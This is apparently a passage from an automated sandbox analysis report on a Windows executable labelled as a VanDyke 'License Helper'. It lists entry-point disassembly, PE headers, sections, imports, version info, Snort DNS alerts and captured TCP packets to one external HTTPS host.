shl ecx, 08h
add ecx, edx
mov dword ptr [0040CF68h], ecx
shr eax, 10h
mov dword ptr [0040CF64h], eax
push 00000001h
call 00007FE49C86475Bh
pop ecx
test eax, eax
jne 00007FE49C86306Ah
push 0000001Ch
call 00007FE49C863110h
pop ecx
call 00007FE49C863BC3h
test eax, eax
jne 00007FE49C86306Ah
push 00000010h
call 00007FE49C8630FFh
pop ecx
and dword ptr [ebp-04h], 00000000h
call 00007FE49C864403h
call dword ptr [0040804Ch]
mov dword ptr [0040D658h], eax
call 00007FE49C8642C1h
mov dword ptr [0040CF54h], eax
call 00007FE49C86406Ah
call 00007FE49C863FACh
call 00007FE49C863D0Fh
mov eax, dword ptr [0040CF80h]
mov dword ptr [0040CF84h], eax
push eax
push dword ptr [0040CF78h]
push dword ptr [0040CF74h]
call 00007FE49C862B32h
add esp, 0Ch

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[ C ] VS98 (6.0) SP6 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8af0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x3d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6bb7	0x7000	False	0.593296595982	data	6.44358253732	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1186	0x2000	False	0.270629882812	data	3.63030337834	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x365c	0x3000	False	0.0801595052083	data	0.843436221473	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x1000	0x1000	False	0.111083984375	data	1.09363315293	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xe058	0x37c	data	English	United States

Imports

DLL	Import
KERNEL32.dll	GetProcAddress, LoadLibraryA, lstrlenW, InterlockedDecrement, CloseHandle, WriteFile, CreateFileW, lstrcatW, GetModuleFileNameW, RaiseException, LocalFree, lstrlenA, InterlockedIncrement, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, MultiByteToWideChar, RtlUnwind, GetCommandLineA, GetVersion, ExitProcess, HeapFree, HeapAlloc, GetCurrentThreadId, TlsSetValue, TlsAlloc, SetLastError, TlsGetValue, GetLastError, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleHandleA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, IsBadWritePtr, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, IsBadReadPtr, IsBadCodePtr, GetCPInfo, GetACP, GetOEMCP, HeapSize
USER32.dll	wsprintfW
ole32.dll	CoInitializeSecurity, CoUninitialize, CoInitialize, CoCreateInstance, CoSetProxyBlanket
OLEAUT32.dll	VariantInit, SafeArrayGetDim, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayAccessData, SafeArrayUnaccessData, SysStringLen, SysAllocStringLen, SysAllocString, VariantClear, SysFreeString, GetErrorInfo

Version Infos

Description	Data
LegalCopyright	Copyright (C) 1995-2018 VanDyke Software, Inc.
InternalName	License Helper
FileVersion	8.5.0.1740
CompanyName	VanDyke Software, Inc.
Comments	\$Revision: 122570 \$
ProductName	License Helper
ProductVersion	8.5.0.1740
FileDescription	License Helper
OriginalFilename	LicenseHelper.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-23:38:25.660129	UDP	1948	DNS zone transfer UDP	58824	53	192.168.2.3	34.97.69.225
08/03/21-23:38:31.551839	UDP	1948	DNS zone transfer UDP	58824	53	192.168.2.3	34.97.69.225
08/03/21-23:38:39.386795	UDP	1948	DNS zone transfer UDP	58824	53	192.168.2.3	34.97.69.225
08/03/21-23:38:50.171576	UDP	1948	DNS zone transfer UDP	58824	53	192.168.2.3	34.97.69.225

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 23:38:06.097122908 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.114178896 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.114345074 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.119462967 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.136428118 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.144661903 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.144718885 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.144751072 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.144821882 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.150866985 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.167779922 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.167906046 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.215509892 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.232352018 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.769733906 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.769762993 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.769779921 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.769804001 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.769818068 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.769840956 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.769855976 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.769893885 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.769905090 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.769912004 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.769963026 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.769974947 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.769979954 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.770143032 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.770167112 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.770183086 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.770209074 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.770230055 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.770538092 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.770561934 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.770582914 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.770606041 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.770627975 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.770677090 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:06.771333933 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:06.811240911 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.030968904 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.030998945 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.031023026 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.031038046 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.031059027 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.031078100 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.031090021 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.031184912 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.031236887 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.031243086 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.031522989 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.031546116 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.031568050 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.031590939 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.031598091 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.031620979 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.032304049 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.032377958 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.041439056 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041465998 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041485071 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041501999 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041523933 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041548967 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041564941 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041615009 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.041665077 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.041671991 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.041891098 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041918039 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041938066 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041956902 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.041964054 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.042023897 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.042691946 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.042717934 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.042741060 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.042763948 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.042768955 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.042800903 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.043505907 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.043582916 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.294538975 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.294569016 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.294590950 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.294611931 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.294626951 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.294715881 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.294802904 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.295092106 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.295165062 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.295166969 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.295197010 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.295249939 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.295593023 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.295634031 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.295669079 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.295691967 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.295706987 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.295763969 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.296103001 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.296154022 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.296195030 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.296207905 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.296231985 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.296283960 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.296917915 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.296951056 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.297003031 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.297183037 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.297225952 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.297261000 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.297280073 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.297291040 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.297341108 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.297765017 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.297796965 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.297847033 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.298377037 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.298414946 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.298451900 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.298466921 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.298482895 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.298528910 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.298691988 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.298722982 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.298775911 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.300493956 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.300539017 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.300591946 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.300618887 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.300621033 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.300683975 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.300765038 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.342564106 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.557621002 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.557643890 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.557658911 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.557672024 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.557740927 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.557840109 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.557885885 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.557900906 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.557913065 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.557920933 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.558018923 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.558037996 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.558481932 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.558499098 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.558514118 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.558532953 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.558640003 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.558681965 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.559278965 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.559319973 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.559334993 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.559350967 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.559391022 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.559432030 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.562549114 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.562565088 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.562583923 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.562597036 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.562661886 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.562685013 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.562925100 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.562947035 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.562967062 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.562982082 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.563039064 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.563059092 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.563543081 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.563570976 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.563591003 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.563610077 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.563657045 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.563697100 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.564296007 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.564316034 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.564332962 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.564394951 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.608185053 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.818180084 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.818238974 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.818281889 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.818310976 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.818315983 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.818348885 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.818377972 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.818387032 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.818423033 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.818437099 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.818450928 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.818501949 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.818969011 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.819009066 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.819045067 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.819072008 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.819092989 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.819147110 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.819789886 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.819840908 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.819878101 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.819890976 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.821234941 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.821285009 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.821302891 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.821326017 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.821353912 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.821398020 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.821542025 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.821590900 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.821607113 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.821631908 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.821657896 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.821686983 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.822166920 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.822246075 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.822267056 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.822283983 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.822319984 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.822335958 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.822346926 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.822395086 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.822808981 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.822865963 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.822901964 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.822920084 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.822932005 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.823065042 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.823437929 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.823474884 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.823504925 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:07.823551893 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:07.873717070 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.080841064 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.080893040 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.080930948 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.080960989 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.080971956 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.080997944 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.081013918 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.081046104 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.081087112 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.081100941 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.081115961 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.081161976 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.081674099 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.081722975 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.081764936 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.081778049 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.081800938 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.081852913 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.082513094 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.082551003 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.082591057 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.082608938 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.082629919 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.082681894 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.083357096 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.083395958 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.083456993 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.084477901 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.084517002 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.084558010 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.084573984 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.084585905 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.084640980 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.084777117 CEST	443	49708	172.67.146.70	192.168.2.3
